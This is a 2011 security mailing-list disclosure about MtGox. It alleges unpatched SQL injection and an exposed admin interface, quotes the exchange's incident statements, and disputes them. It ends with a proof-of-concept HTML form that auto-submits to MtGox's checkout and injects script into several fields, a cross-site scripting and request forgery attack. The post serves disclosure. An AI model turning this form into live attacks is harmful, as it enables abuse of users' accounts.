I have two independent sources claiming known SQLi vulnerabilities in MtGox. One of said SQLi vulnerabilties was confirmed to be patched on the 16th. The other was not patched, to anyone's knowledge, at the time of the market crash and database leak. The one that was not patched could have plausibly been used to dump the user table. The details follow in these chat logs. POC for the referenced xss+csrf is also provided. Whether or not it is still an issue is not known for sure at this time as the site cannot be accessed. It has also been found that MtGox exposes it's admin user interface even if a user does not have the admin flag set on their account. As of now it is thought that most actions attempted to be used will throw permission errors. Once again. This cannot be confirmed at this time. https://mtgox.com/app/webroot/code/admin MagicalTux, now that your claim "The site was not compromised with a SQL injection as many are reporting, so in effect the site was not hacked." Please respond. The truth this time. MagicalTux's official response at the time of this writing is also attached. It is available at: https://support.mtgox.com/entries/20208066-huge-bitcoin-sell-off-due-to-a-compromised-account-rollback These logs are not modified except for user's hostmasks at their request due to MagicalTux's new found policy of committing libel against his users based on login logs, since he apparently doesn't keep order book logs for orders that go through immediately, by his own admission. Classy. Mirrors: http://privatepaste.com/93e8a9cd64 (#bitcoin-hax log) http://privatepaste.com/47a50cab5b (sig) http://www.mediafire.com/?m7o4z3oz9nyd3v3 (#bitcoin-hax log) http://www.mediafire.com/?nzcpa5mwpw9ccbb (sig) http://privatepaste.com/e4bacfae37 (PovAddict log) http://privatepaste.com/9dc5daf8a0 (sig) http://www.mediafire.com/?bflr76anvv835ib (PovAddict log) http://www.mediafire.com/?rl250c2dahw7dx9 (sig) http://privatepaste.com/6dad3927d6 (XSS + CSRF) http://privatepaste.com/45e5aa0d30 (sig) http://www.mediafire.com/?synt5sjcbkl9zvq (XSS + CSRF) http://www.mediafire.com/?uv7be34198pseoo (sig)
Attachment:
#bitcoin-hax_20110620.log
Description: Binary data
Attachment:
#bitcoin-hax_20110620.log.asc
Description: Binary data
The official response from MagicalTux at time of this writing:
https://support.mtgox.com/entries/20208066-huge-bitcoin-sell-off-due-to-a-compromised-account-rollback
Huge Bitcoin sell off due to a compromised account - rollback
[Update - 12:52 GMT] Account recovery page will be up tomorrow morning (Japan
time)
We have almost completed the account recovery page and are waiting for result
to unit tests and intrusion tests (and more than anything, don't want to put
something online and go to sleep just after, best way to get screwed), so the
page will be put online tomorrow morning.
It will allow every user to claim ownership of their account based on proof
such as deposits, withdraws, password (if complex enough), email or notarized
documentation.
Once it is deemed enough users had the chance to get their account back, the
exchange will be open again (opening time will be announced at least 24 hours
in advance). It will still be possible to file claims for user accounts after
this.
[Update - 6:30 GMT] Still here. Still working hard to get things online.
¥ SHA-512 multi-iteration salted hashing is in enabled and ready
for when we get users reactivating their accounts
¥ We are going to push our relaunch time to 2:00am GMT tomorrow
so we have time to launch a our new backend and withdraw passwords.
Thanks to everyone sending the supportive emails and our extremely patient
users.Ê
Ê
Ê
[Update - 3:45 GMT] DO NOT DOWNLOAD ANYTHING
If you receive ANY email which seems coming from Mt.Gox asking you to download
something (certificate, generating program, etc), DO NOT DOWNLOAD. Do not
either input your password on any site which is not MTGOX.COM.
Ê
[Update - 2:06 GMT] What we know and what is being done.
¥ It appears that someone who performs audits on our system and
had read-only access to our database had their computer compromised. This
allowed for someone to pull our database. The site was not compromised with a
SQL injection as many are reporting, so in effect the site was not hacked.
¥ Two months ago we migrated from MD5 hashing to freeBSD MD5
salted hashing.ÊThe unsalted user accounts in the wild are ones that haven't
been accessed in over 2 months and are considered idle. Once we are back up we
will have implemented SHA-512 multi-iteration salted hashing and all users will
be required to update to a new strong password.
¥ We have been working with Google to ensure any gmail accounts
associated with Mt.Gox user accounts have been locked and need to be
reverified.Ê
¥ Mt.Gox will continue to be offline as we continue our
investigation, at this time we are pushing it to 8:00am GMT.Ê
¥ When Mt.Gox comes back online, we will be putting all users
through a new security measure to authenticate the users. This will be a mix of
matching the last IP address that accessed the account, verifying their email
address, account name and old password. Users will then be prompted to enter in
a new strong password.
¥ Once Mt.Gox is back online, Êtrades Ê218869~222470 will be
reverted.Ê
We will continue to update as we find new information.
Huge Bitcoin sell off due to a compromised account - rollback
Ê
The bitcoin will be back to around 17.5$/BTC after we rollback all trades that
have happened after the huge Bitcoin sale that happened on June 20th near
3:00am (JST).
One account with a lot of coins was compromised and whoever stole it (using a
HK based IP to login) first sold all the coins in there, to buy those again
just after, and then tried to withdraw the coins. The $1000/day withdraw limit
was active for this account and the hacker could only get out with $1000 worth
of coins.
Apart from this no account was compromised, and nothing was lost. Due to the
large impact this had on the Bitcoin market, we will rollback every trade which
happened since the big sale, and ensure this account is secure before opening
access again.
UPDATE REGARDING LEAKED ACCOUNT INFORMATIONS
We will address this issue too and prevent logins from each users. Leaked
information includes username, email and hashed password, which does not allow
anyone to get to the actual password, should it be complex enough. If you used
a simple password you will not be able to login on Mt.Gox until you change your
password to something more secure. If you used the same password on different
places, it is recommended to change it as soon as possible.
SERVICE RETURN
Service will not be back before June 20th 11:00am (JST, 02:00am GMT). This may
be delayed depending on what is found during the investigation.
<body onload="/*document.forms['foo'].submit()*/">
<form id="foo" action="https://mtgox.com/merch/checkout"; method="post" >
<input type="hidden" name="notify_url"
value="http://yourdomain.com/ipn.php"})}alert(1);function
blah(){test({5:"">
<input type="hidden" name="business" value="foobar">
<input type="hidden" name="currency_code" value="USD">
<input type="hidden" name="item_name" value="Your Item
Name<script>alert(1);</script>">
<input type="hidden" name="custom" value="your custom msg to
yourself"})}alert(1);function blah(){test({5:"" >
<input type="hidden" name="amount" value="10.30">
<input type="hidden" name="return" value="http://yourdomain.com/thanks";>
<!--<input type="hidden" name="return"
value="http://yourdomain.com/thanks";}alert(1);</script><script>">-->
<input type="submit" value="Pay with Mt Gox" />
</form>
Attachment:
mtgox-ss.txt.asc
Description: Binary data
Attachment:
PovAddict_20110620.log
Description: Binary data
Attachment:
PovAddict_20110620.log.asc
Description: Binary data
-- Douglas Huff
Attachment:
smime.p7s
Description: S/MIME cryptographic signature
Attachment:
PGP.sig
Description: This is a digitally signed message part
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/